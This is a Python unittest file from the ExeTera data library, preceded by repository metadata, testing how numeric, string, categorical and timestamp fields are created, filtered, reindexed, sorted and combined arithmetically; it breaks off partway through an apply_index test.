| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f380d9971770a2bab414911f274c833c40843d2
| 54,090
|
py
|
Python
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 14
|
2021-03-01T16:57:46.000Z
|
2021-12-01T10:49:19.000Z
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 208
|
2021-02-16T13:47:04.000Z
|
2022-03-31T11:27:03.000Z
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 5
|
2021-03-08T08:50:26.000Z
|
2021-12-03T09:26:43.000Z
|
import unittest
import numpy as np
from io import BytesIO
import h5py
from exetera.core import session
from exetera.core import fields
from exetera.core import persistence as per
from exetera.core import field_importers as fi
from exetera.core import utils
class TestFieldExistence(unittest.TestCase):
    """A field of every kind must be truthy immediately after creation."""

    def test_field_truthness(self):
        buffer = BytesIO()
        with session.Session() as s:
            dataset = s.open_dataset(buffer, "w", "src")
            frame = dataset.create_dataframe('src')
            # Create one field of each kind, in order, and check truthiness.
            factories = [
                lambda: s.create_indexed_string(frame, "a"),
                lambda: s.create_fixed_string(frame, "b", 5),
                lambda: s.create_numeric(frame, "c", "int32"),
                lambda: s.create_categorical(frame, "d", "int8", {"no": 0, "yes": 1}),
            ]
            for make_field in factories:
                self.assertTrue(bool(make_field()))
class TestFieldGetSpans(unittest.TestCase):
    """get_spans: boundaries of runs of equal consecutive values."""

    def test_get_spans(self):
        '''
        Here test only the numeric field, categorical field and fixed string field.
        Indexed string see TestIndexedStringFields below
        '''
        vals = np.asarray([0, 1, 1, 3, 3, 6, 5, 5, 5], dtype=np.int32)
        bio = BytesIO()
        with session.Session() as s:
            # get_spans over a raw ndarray, via the session
            self.assertListEqual([0, 1, 3, 5, 6, 9], s.get_spans(vals).tolist())
            dst = s.open_dataset(bio, "w", "src")
            ds = dst.create_dataframe('src')
            # numeric field: same values, same spans
            vals_f = s.create_numeric(ds, "vals", "int32")
            vals_f.data.write(vals)
            self.assertListEqual([0, 1, 3, 5, 6, 9], vals_f.get_spans().tolist())
            # fixed-string field
            fxdstr = s.create_fixed_string(ds, 'fxdstr', 2)
            fxdstr.data.write(np.asarray(['aa', 'bb', 'bb', 'cc', 'cc', 'dd', 'dd', 'dd', 'ee'], dtype='S2'))
            self.assertListEqual([0, 1, 3, 5, 8, 9], list(fxdstr.get_spans()))
            # categorical field
            cat = s.create_categorical(ds, 'cat', 'int8', {'a': 1, 'b': 2})
            cat.data.write([1, 1, 2, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2])
            self.assertListEqual([0, 2, 4, 7, 10, 11, 12, 13, 14], list(cat.get_spans()))
class TestIsSorted(unittest.TestCase):
    """is_sorted: False for shuffled data, True after sorting, for every
    field kind (indexed string, fixed string, numeric, categorical,
    timestamp)."""

    def test_indexed_string_is_sorted(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('foo')
            f = df.create_indexed_string('f')
            vals = ['the', 'quick', '', 'brown', 'fox', 'jumps', '', 'over', 'the', 'lazy', '', 'dog']
            f.data.write(vals)
            self.assertFalse(f.is_sorted())
            # the same values, sorted, must report sorted
            f2 = df.create_indexed_string('f2')
            svals = sorted(vals)
            f2.data.write(svals)
            self.assertTrue(f2.is_sorted())

    def test_fixed_string_is_sorted(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('foo')
            f = df.create_fixed_string('f', 5)
            vals = ['a', 'ba', 'bb', 'bac', 'de', 'ddddd', 'deff', 'aaaa', 'ccd']
            # fixed-string fields store bytes, hence the encode
            f.data.write([v.encode() for v in vals])
            self.assertFalse(f.is_sorted())
            f2 = df.create_fixed_string('f2', 5)
            svals = sorted(vals)
            f2.data.write([v.encode() for v in svals])
            self.assertTrue(f2.is_sorted())

    def test_numeric_is_sorted(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('foo')
            f = df.create_numeric('f', 'int32')
            vals = [74, 1897, 298, 0, -100098, 380982340, 8, 6587, 28421, 293878]
            f.data.write(vals)
            self.assertFalse(f.is_sorted())
            f2 = df.create_numeric('f2', 'int32')
            svals = sorted(vals)
            f2.data.write(svals)
            self.assertTrue(f2.is_sorted())

    def test_categorical_is_sorted(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('foo')
            f = df.create_categorical('f', 'int8', {'a': 0, 'c': 1, 'd': 2, 'b': 3})
            vals = [0, 1, 3, 2, 3, 2, 2, 0, 0, 1, 2]
            f.data.write(vals)
            self.assertFalse(f.is_sorted())
            f2 = df.create_categorical('f2', 'int8', {'a': 0, 'c': 1, 'd': 2, 'b': 3})
            # sortedness is judged on the stored codes, not the key labels
            svals = sorted(vals)
            f2.data.write(svals)
            self.assertTrue(f2.is_sorted())

    def test_timestamp_is_sorted(self):
        from datetime import datetime as D
        from datetime import timedelta as T
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('foo')
            f = df.create_timestamp('f')
            d = D(2020, 5, 10)
            vals = [d + T(seconds=50000), d - T(days=280), d + T(weeks=2), d + T(weeks=250),
                    d - T(weeks=378), d + T(hours=2897), d - T(days=23), d + T(minutes=39873)]
            # timestamp fields hold POSIX float timestamps
            vals = [v.timestamp() for v in vals]
            f.data.write(vals)
            self.assertFalse(f.is_sorted())
            f2 = df.create_timestamp('f2')
            svals = sorted(vals)
            f2.data.write(svals)
            self.assertTrue(f2.is_sorted())
class TestIndexedStringFields(unittest.TestCase):
    """Indexed string fields: creation, filtering, re-indexing, legacy
    value handling and get_spans.  The expected `values` lists are the
    UTF-8 byte codes of the concatenated strings (97 == 'a', etc.)."""

    def test_create_indexed_string(self):
        # Smoke test: a freshly created indexed string field exposes
        # readable data without error.
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'src')
            df = ds.create_dataframe('src')
            f = df.create_indexed_string('f')
            d = f.data[:]
            print(d)

    def test_filter_indexed_string(self):
        bio = BytesIO()
        with session.Session() as s:
            dst = s.open_dataset(bio, "w", "src")
            hf = dst.create_dataframe('src')
            data = ['a', 'bb', 'ccc', 'dddd']
            indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
            foo = fi.IndexedStringImporter(s, hf, 'foo')
            foo.import_part(indices, values, offsets, 0, written_row_count)
            # cumulative string lengths: 'a'|'bb'|'ccc'|'dddd'
            self.assertListEqual([0, 1, 3, 6, 10], hf['foo'].indices[:].tolist())
            f2 = s.create_indexed_string(hf, 'bar')
            # keep rows 1 and 2 ('bb', 'ccc') only
            s.apply_filter(np.asarray([False, True, True, False]), hf['foo'], f2)
            self.assertListEqual([0, 2, 5], f2.indices[:].tolist())
            self.assertListEqual([98, 98, 99, 99, 99], f2.values[:].tolist())
            self.assertListEqual(['bb', 'ccc'], f2.data[:])
            self.assertEqual('bb', f2.data[0])
            self.assertEqual('ccc', f2.data[1])

    def test_reindex_indexed_string(self):
        bio = BytesIO()
        with session.Session() as s:
            dst = s.open_dataset(bio, "w", "src")
            hf = dst.create_dataframe('src')
            data = ['a', 'bb', 'ccc', 'dddd']
            indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
            foo = fi.IndexedStringImporter(s, hf, 'foo')
            foo.import_part(indices, values, offsets, 0, written_row_count)
            self.assertListEqual([0, 1, 3, 6, 10], hf['foo'].indices[:].tolist())
            f2 = s.create_indexed_string(hf, 'bar')
            # reorder rows to dddd, a, ccc, bb
            s.apply_index(np.asarray([3, 0, 2, 1], dtype=np.int64), hf['foo'], f2)
            self.assertListEqual([0, 4, 5, 8, 10], f2.indices[:].tolist())
            self.assertListEqual([100, 100, 100, 100, 97, 99, 99, 99, 98, 98],
                                 f2.values[:].tolist())
            self.assertListEqual(['dddd', 'a', 'ccc', 'bb'], f2.data[:])

    def test_update_legacy_indexed_string_that_has_uint_values(self):
        bio = BytesIO()
        with session.Session() as s:
            dst = s.open_dataset(bio, "w", "src")
            hf = dst.create_dataframe('src')
            data = ['a', 'bb', 'ccc', 'dddd']
            indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
            foo = fi.IndexedStringImporter(s, hf, 'foo')
            foo.import_part(indices, values, offsets, 0, written_row_count)
            # raw byte codes of 'abbcccdddd'
            self.assertListEqual([97, 98, 98, 99, 99, 99, 100, 100, 100, 100], hf['foo'].values[:].tolist())

    def test_index_string_field_get_span(self):
        bio = BytesIO()
        with session.Session() as s:
            dst = s.open_dataset(bio, "w", "src")
            ds = dst.create_dataframe('src')
            idx = s.create_indexed_string(ds, 'idx')
            idx.data.write(['aa', 'bb', 'bb', 'c', 'c', 'c', 'ddd', 'ddd', 'e', 'f', 'f', 'f'])
            self.assertListEqual([0, 1, 3, 6, 8, 9, 12], s.get_spans(idx))
class TestFieldArray(unittest.TestCase):
    """Partial writes to and clearing of a numeric field's data array."""

    def test_write_part(self):
        buffer = BytesIO()
        sess = session.Session()
        dataset = sess.open_dataset(buffer, "w", "src")
        frame = dataset.create_dataframe('src')
        field = sess.create_numeric(frame, 'num', 'int32')
        field.data.write_part(np.arange(10))
        # the partial write must be readable back in full
        self.assertListEqual(list(range(10)), list(field.data[:]))

    def test_clear(self):
        buffer = BytesIO()
        sess = session.Session()
        dataset = sess.open_dataset(buffer, "w", "src")
        frame = dataset.create_dataframe('src')
        field = sess.create_numeric(frame, 'num', 'int32')
        field.data.write_part(np.arange(10))
        field.data.clear()
        # clearing discards everything that was written
        self.assertListEqual([], list(field.data[:]))
class TestMemoryFieldCreateLike(unittest.TestCase):
    """create_like: produce an empty field of the same kind that accepts the
    original (or a derived memory) field's data."""

    def test_categorical_create_like(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            foo = df.create_categorical('foo', 'int8', {b'a': 0, b'b': 1})
            foo.data.write(np.array([0, 1, 1, 0]))
            foo2 = foo.create_like(df, 'foo2')
            # writing a field into its clone copies the data through
            foo2.data.write(foo)
            self.assertListEqual([0, 1, 1, 0], foo2.data[:].tolist())

    def test_numeric_create_like(self):
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            foo = df.create_numeric('foo', 'int32')
            foo.data.write(np.array([1, 2, 3, 4]))
            # arithmetic on a field yields a memory field; create_like on it
            # must still produce a writable dataframe field
            mfoo = foo + 1
            foo2 = mfoo.create_like(df, 'foo2')
            foo2.data.write(mfoo)
            self.assertListEqual([2, 3, 4, 5], foo2.data[:].tolist())
class TestMemoryFields(unittest.TestCase):
    """Arithmetic/comparison operators on memory fields and dataframe fields
    must match the same operation applied to the raw numpy arrays, in every
    combination (field op field, field op array, field op scalar, reversed)."""

    def _execute_memory_field_test(self, a1, a2, scalar, function):
        # Check `function` over pure memory fields against numpy ground truth.
        def test_simple(expected, actual):
            self.assertListEqual(expected.tolist(), actual.data[:].tolist())

        def test_tuple(expected, actual):
            # divmod-style operations return a pair of fields
            self.assertListEqual(expected[0].tolist(), actual[0].data[:].tolist())
            self.assertListEqual(expected[1].tolist(), actual[1].data[:].tolist())

        expected = function(a1, a2)
        expected_scalar = function(a1, scalar)
        expected_rscalar = function(scalar, a2)
        test_equal = test_tuple if isinstance(expected, tuple) else test_simple
        s = session.Session()
        f1 = fields.NumericMemField(s, 'int32')
        f2 = fields.NumericMemField(s, 'int32')
        f1.data.write(a1)
        f2.data.write(a2)
        test_equal(expected, function(f1, f2))
        test_equal(expected, function(f1, a2))
        test_equal(expected, function(fields.as_field(a1), f2))
        # Fix: use the `scalar` parameter here rather than a hard-coded 1,
        # matching how expected_scalar/expected_rscalar were computed above
        # (all current callers pass scalar=1, so behavior is unchanged).
        test_equal(expected_scalar, function(f1, scalar))
        test_equal(expected_rscalar, function(scalar, f2))

    def _execute_field_test(self, a1, a2, scalar, function):
        # Check `function` across dataframe fields and memory fields, and
        # that a derived memory field writes back into a dataframe field.
        def test_simple(expected, actual):
            self.assertListEqual(expected.tolist(), actual.data[:].tolist())

        def test_tuple(expected, actual):
            self.assertListEqual(expected[0].tolist(), actual[0].data[:].tolist())
            self.assertListEqual(expected[1].tolist(), actual[1].data[:].tolist())

        expected = function(a1, a2)
        expected_scalar = function(a1, scalar)
        expected_rscalar = function(scalar, a2)
        test_equal = test_tuple if isinstance(expected, tuple) else test_simple
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            m1 = fields.NumericMemField(s, fields.dtype_to_str(a1.dtype))
            m2 = fields.NumericMemField(s, fields.dtype_to_str(a2.dtype))
            m1.data.write(a1)
            m2.data.write(a2)
            f1 = df.create_numeric('f1', fields.dtype_to_str(a1.dtype))
            f2 = df.create_numeric('f2', fields.dtype_to_str(a2.dtype))
            f1.data.write(a1)
            f2.data.write(a2)
            # test memory field and field operations
            test_equal(expected, function(f1, f2))
            test_equal(expected, function(f1, m2))
            test_equal(expected, function(m1, f2))
            test_equal(expected_scalar, function(f1, scalar))
            test_equal(expected_rscalar, function(scalar, f2))
            # test that the resulting memory field writes to a non-memory field properly
            r = function(f1, f2)
            if isinstance(r, tuple):
                df.create_numeric(
                    'f3a', fields.dtype_to_str(r[0].data.dtype)).data.write(r[0])
                df.create_numeric(
                    'f3b', fields.dtype_to_str(r[1].data.dtype)).data.write(r[1])
                test_simple(expected[0], df['f3a'])
                test_simple(expected[1], df['f3b'])
            else:
                df.create_numeric(
                    'f3', fields.dtype_to_str(r.data.dtype)).data.write(r)
                test_simple(expected, df['f3'])

    def test_mixed_field_add(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x + y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x + y)

    def test_mixed_field_sub(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x - y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x - y)

    def test_mixed_field_mul(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x * y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x * y)

    def test_mixed_field_div(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x / y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x / y)

    def test_mixed_field_floordiv(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x // y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x // y)

    def test_mixed_field_mod(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x % y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x % y)

    def test_mixed_field_divmod(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: divmod(x, y))
        self._execute_field_test(a1, a2, 1, lambda x, y: divmod(x, y))

    def test_mixed_field_and(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x & y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x & y)

    def test_mixed_field_xor(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x ^ y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x ^ y)

    def test_mixed_field_or(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([2, 3, 4, 5], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x | y)
        self._execute_field_test(a1, a2, 1, lambda x, y: x | y)

    # The comparison tests below previously contained a dead local
    # (`r = 1 < a1`) that was never read; it has been removed.

    def test_less_than(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x < y)

    def test_less_than_equal(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x <= y)

    def test_equal(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x == y)

    def test_not_equal(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x != y)

    def test_greater_than_equal(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x >= y)

    def test_greater_than(self):
        a1 = np.array([1, 2, 3, 4], dtype=np.int32)
        a2 = np.array([5, 4, 3, 2], dtype=np.int32)
        self._execute_memory_field_test(a1, a2, 1, lambda x, y: x > y)

    def test_categorical_remap(self):
        # remap re-codes categorical values and replaces the key dictionary
        bio = BytesIO()
        with session.Session() as s:
            ds = s.open_dataset(bio, 'w', 'ds')
            df = ds.create_dataframe('df')
            foo = df.create_categorical('foo', 'int8', {b'a': 1, b'b': 2})
            foo.data.write(np.array([1, 2, 2, 1], dtype='int8'))
            mbar = foo.remap([(1, 0), (2, 1)], {b'a': 0, b'b': 1})
            self.assertListEqual([0, 1, 1, 0], mbar.data[:].tolist())
            self.assertDictEqual({0: b'a', 1: b'b'}, mbar.keys)
            bar = mbar.create_like(df, 'bar')
            bar.data.write(mbar)
            self.assertListEqual([0, 1, 1, 0], mbar.data[:].tolist())
            self.assertDictEqual({0: b'a', 1: b'b'}, mbar.keys)
class TestFieldApplyFilter(unittest.TestCase):
def test_indexed_string_apply_filter(self):
data = ['a', 'bb', 'ccc', 'dddd', '', 'eeee', 'fff', 'gg', 'h']
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
expected_indices = [0, 1, 3, 6, 10, 10, 14, 17, 19, 20]
expected_values = [97, 98, 98, 99, 99, 99, 100, 100, 100, 100,
101, 101, 101, 101, 102, 102, 102, 103, 103, 104]
expected_filt_indices = [0, 2, 6, 10, 12]
expected_filt_values = [98, 98, 100, 100, 100, 100, 101, 101, 101, 101, 103, 103]
expected_filt_data = ['bb', 'dddd', 'eeee', 'gg']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_indexed_string('f')
f.data.write(data)
self.assertListEqual(expected_indices, f.indices[:].tolist())
self.assertListEqual(expected_values, f.values[:].tolist())
self.assertListEqual(data, f.data[:])
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected_filt_indices, f.indices[:].tolist())
self.assertListEqual(expected_filt_values, f.values[:].tolist())
self.assertListEqual(expected_filt_data, f.data[:])
self.assertListEqual(expected_filt_indices, ff.indices[:].tolist())
self.assertListEqual(expected_filt_values, ff.values[:].tolist())
self.assertListEqual(expected_filt_data, ff.data[:])
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected_filt_indices, fg.indices[:].tolist())
self.assertListEqual(expected_filt_values, fg.values[:].tolist())
self.assertListEqual(expected_filt_data, fg.data[:])
self.assertListEqual(expected_filt_indices, fgr.indices[:].tolist())
self.assertListEqual(expected_filt_values, fgr.values[:].tolist())
self.assertListEqual(expected_filt_data, fgr.data[:])
fh = g.apply_filter(filt)
self.assertListEqual(expected_filt_indices, fh.indices[:].tolist())
self.assertListEqual(expected_filt_values, fh.values[:].tolist())
self.assertListEqual(expected_filt_data, fh.data[:])
mf = fields.IndexedStringMemField(s)
mf.data.write(data)
self.assertListEqual(expected_indices, mf.indices[:].tolist())
self.assertListEqual(expected_values, mf.values[:].tolist())
self.assertListEqual(data, mf.data[:])
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected_filt_indices, mf.indices[:].tolist())
self.assertListEqual(expected_filt_values, mf.values[:].tolist())
self.assertListEqual(expected_filt_data, mf.data[:])
b = df.create_indexed_string('bar')
b.data.write(data)
self.assertListEqual(expected_indices, b.indices[:].tolist())
self.assertListEqual(expected_values, b.values[:].tolist())
self.assertListEqual(data, b.data[:])
mb = b.apply_filter(filt)
self.assertListEqual(expected_filt_indices, mb.indices[:].tolist())
self.assertListEqual(expected_filt_values, mb.values[:].tolist())
self.assertListEqual(expected_filt_data, mb.data[:])
df2 = ds.create_dataframe("filter")
def test_fixed_string_apply_filter(self):
data = np.array([b'a', b'bb', b'ccc', b'dddd', b'eeee', b'fff', b'gg', b'h'], dtype='S4')
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=bool)
expected = [b'bb', b'dddd', b'fff', b'h']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_fixed_string('foo', 4)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.FixedStringMemField(s, 4)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_fixed_string('bar', 4)
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
def test_numeric_apply_filter(self):
data = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9], dtype=np.int32)
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
expected = [2, 4, 6, 8]
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_numeric('foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.NumericMemField(s, 'int32')
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_numeric('bar', 'int32')
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
def test_categorical_apply_filter(self):
    """apply_filter on a categorical field keeps exactly the rows where the filter is True."""
    data = np.array([0, 1, 2, 0, 1, 2, 2, 1, 0], dtype=np.int32)
    keys = {b'a': 0, b'b': 1, b'c': 2}
    filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
    expected = [1, 0, 2, 1]
    bio = BytesIO()
    with session.Session() as s:
        ds = s.open_dataset(bio, 'w', 'ds')
        df = ds.create_dataframe('df')

        # In-place filtering mutates the field and also returns it.
        cat_fld = df.create_categorical('foo', 'int8', keys)
        cat_fld.data.write(data)
        self.assertListEqual(data.tolist(), cat_fld.data[:].tolist())
        returned = cat_fld.apply_filter(filt, in_place=True)
        self.assertListEqual(expected, cat_fld.data[:].tolist())
        self.assertListEqual(expected, returned.data[:].tolist())

        # Filtering into an explicitly supplied destination field.
        src_fld = cat_fld.create_like(df, 'g')
        src_fld.data.write(data)
        dest_fld = cat_fld.create_like(df, 'fg')
        dest_ret = src_fld.apply_filter(filt, dest_fld)
        self.assertListEqual(expected, dest_fld.data[:].tolist())
        self.assertListEqual(expected, dest_ret.data[:].tolist())

        # Filtering with no destination produces a new field; the source is untouched.
        derived = src_fld.apply_filter(filt)
        self.assertListEqual(expected, derived.data[:].tolist())

        # The same semantics hold for an in-memory categorical field.
        mem_fld = fields.CategoricalMemField(s, 'int8', keys)
        mem_fld.data.write(data)
        self.assertListEqual(data.tolist(), mem_fld.data[:].tolist())
        mem_fld.apply_filter(filt, in_place=True)
        self.assertListEqual(expected, mem_fld.data[:].tolist())

        # A dataset field filtered without in_place yields a filtered copy.
        bar_fld = df.create_categorical('bar', 'int8', keys)
        bar_fld.data.write(data)
        self.assertListEqual(data.tolist(), bar_fld.data[:].tolist())
        bar_copy = bar_fld.apply_filter(filt)
        self.assertListEqual(expected, bar_copy.data[:].tolist())
def test_timestamp_apply_filter(self):
    """apply_filter on a timestamp field keeps exactly the rows where the filter is True."""
    from datetime import datetime as D
    from datetime import timezone
    raw = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
           D(2110, 11, 1, tzinfo=timezone.utc), D(2002, 3, 3, tzinfo=timezone.utc), D(2018, 2, 28, tzinfo=timezone.utc), D(2400, 9, 1, tzinfo=timezone.utc)]
    data = np.asarray([d.timestamp() for d in raw], dtype=np.float64)
    filt = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=bool)
    # Expected is simply the boolean-masked source values.
    expected = data[filt].tolist()
    bio = BytesIO()
    with session.Session() as s:
        ds = s.open_dataset(bio, 'w', 'ds')
        df = ds.create_dataframe('df')

        # In-place filtering mutates the field and also returns it.
        ts_fld = df.create_timestamp('foo')
        ts_fld.data.write(data)
        self.assertListEqual(data.tolist(), ts_fld.data[:].tolist())
        returned = ts_fld.apply_filter(filt, in_place=True)
        self.assertListEqual(expected, ts_fld.data[:].tolist())
        self.assertListEqual(expected, returned.data[:].tolist())

        # Filtering into an explicitly supplied destination field.
        src_fld = ts_fld.create_like(df, 'g')
        src_fld.data.write(data)
        dest_fld = ts_fld.create_like(df, 'fg')
        dest_ret = src_fld.apply_filter(filt, dest_fld)
        self.assertListEqual(expected, dest_fld.data[:].tolist())
        self.assertListEqual(expected, dest_ret.data[:].tolist())

        # Filtering with no destination produces a new field; the source is untouched.
        derived = src_fld.apply_filter(filt)
        self.assertListEqual(expected, derived.data[:].tolist())

        # The same semantics hold for an in-memory timestamp field.
        mem_fld = fields.TimestampMemField(s)
        mem_fld.data.write(data)
        self.assertListEqual(data.tolist(), mem_fld.data[:].tolist())
        mem_fld.apply_filter(filt, in_place=True)
        self.assertListEqual(expected, mem_fld.data[:].tolist())

        # A dataset field filtered without in_place yields a filtered copy.
        bar_fld = df.create_timestamp('bar')
        bar_fld.data.write(data)
        self.assertListEqual(data.tolist(), bar_fld.data[:].tolist())
        bar_copy = bar_fld.apply_filter(filt)
        self.assertListEqual(expected, bar_copy.data[:].tolist())
class TestFieldApplyIndex(unittest.TestCase):
    """Tests for Field.apply_index: gathering/reordering field rows by an index array.

    Each test exercises the same four variants for one field type:
      * in_place=True (mutates the field and returns it),
      * an explicit destination field,
      * no destination (returns a new field),
      * the equivalent in-memory (*MemField) field.
    """

    def test_indexed_string_apply_index(self):
        data = ['a', 'bb', 'ccc', 'dddd', '', 'eeee', 'fff', 'gg', 'h']
        inds = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
        # Index/value pairs are the CSR-style representation of the strings
        # (values are the ASCII codes of the concatenated characters).
        expected_indices = [0, 1, 3, 6, 10, 10, 14, 17, 19, 20]
        expected_values = [97, 98, 98, 99, 99, 99, 100, 100, 100, 100,
                           101, 101, 101, 101, 102, 102, 102, 103, 103, 104]
        expected_filt_indices = [0, 1, 2, 4, 6, 9, 12, 16, 20, 20]
